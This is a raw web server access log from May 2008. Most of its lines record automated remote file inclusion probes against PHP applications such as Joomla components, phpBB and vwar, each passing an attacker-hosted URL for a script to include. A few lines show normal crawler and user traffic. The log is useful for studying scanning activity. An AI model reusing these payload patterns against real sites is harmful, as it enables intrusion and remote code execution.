213.194.149.96 - - [28/May/2008:10:50:42 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.96 - - [28/May/2008:10:50:42 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:51:14 -0700] "GET /logs/access_080327.log//components/com_simpleboard/image_upload.php?sbp=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.188.60.54 - - [28/May/2008:10:51:17 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:51:23 -0700] "GET /logs/access.log/db.php?path_local=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:51:24 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:51:24 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.31.109 - - [28/May/2008:10:51:37 -0700] "GET /logs/access_080418.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:51:38 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:52:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:52:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:10:52:11 -0700] "GET /logs/photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:10:52:13 -0700] "GET /photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:52:54 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:52:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:52:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:52:56 -0700] "GET /logs/access_071229.log/login.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:52:56 -0700] "GET /login.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:52:56 -0700] "GET /logs/login.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:52:57 -0700] "GET /logs/access_080117.log/login.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:52:58 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:52:58 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:52:58 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:04 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:04 -0700] "GET /skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:04 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:53:20 -0700] "GET /logs/index.php?_REQUEST=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:53:21 -0700] "GET /logs/access_071211.log/db.php?path_local=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:53:21 -0700] "GET /index.php?_REQUEST=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:29 -0700] "GET /logs/access_080107.log/skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:53:41 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:53:41 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:49 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:49 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:53:49 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:54:13 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:54:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:54:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:54:22 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:54:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:54:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.97 - - [28/May/2008:10:54:24 -0700] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:54:38 -0700] "GET /logs/access_080308.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:10:54:43 -0700] "GET /logs/access_080106.log//claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:10:54:45 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:10:54:47 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [28/May/2008:10:54:52 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=637 HTTP/1.1" 200 7603 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [28/May/2008:10:55:04 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=637 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=637" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [28/May/2008:10:55:05 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=637&just_updated=1 HTTP/1.1" 200 7645 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=637" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [28/May/2008:10:55:07 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=637&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [28/May/2008:10:55:09 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [28/May/2008:10:55:10 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32782 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:55:10 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:55:11 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:55:11 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:55:29 -0700] "GET /logs/access_080327.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:10:55:39 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:10:55:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:10:55:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:55:52 -0700] "GET /logs/access_080201.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:55:53 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:55:53 -0700] "GET /logs//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:10:56:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:56:24 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:56:36 -0700] "GET /logs/access_080327.log//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:10:57:30 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:10:57:30 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:10:57:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:10:57:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:10:57:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:10:57:50 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:10:57:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:51 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:51 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:51 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:51 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:51 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:54 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:55 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:57:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:10:57:55 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:10:57:55 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:10:57:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:10:57:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:10:57:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:10:57:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:10:58:02 -0700] "GET /logs//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:10:58:02 -0700] "GET //ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:10:58:08 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:10:58:08 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:10:58:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:10:58:08 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:10:58:08 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:10:58:08 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:10:58:08 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:10:58:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:10:58:08 -0700] "GET /logs/access_080201.log//modules/vwar/admin/errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:10:58:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:10:58:09 -0700] "GET //modules/vwar/admin/errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
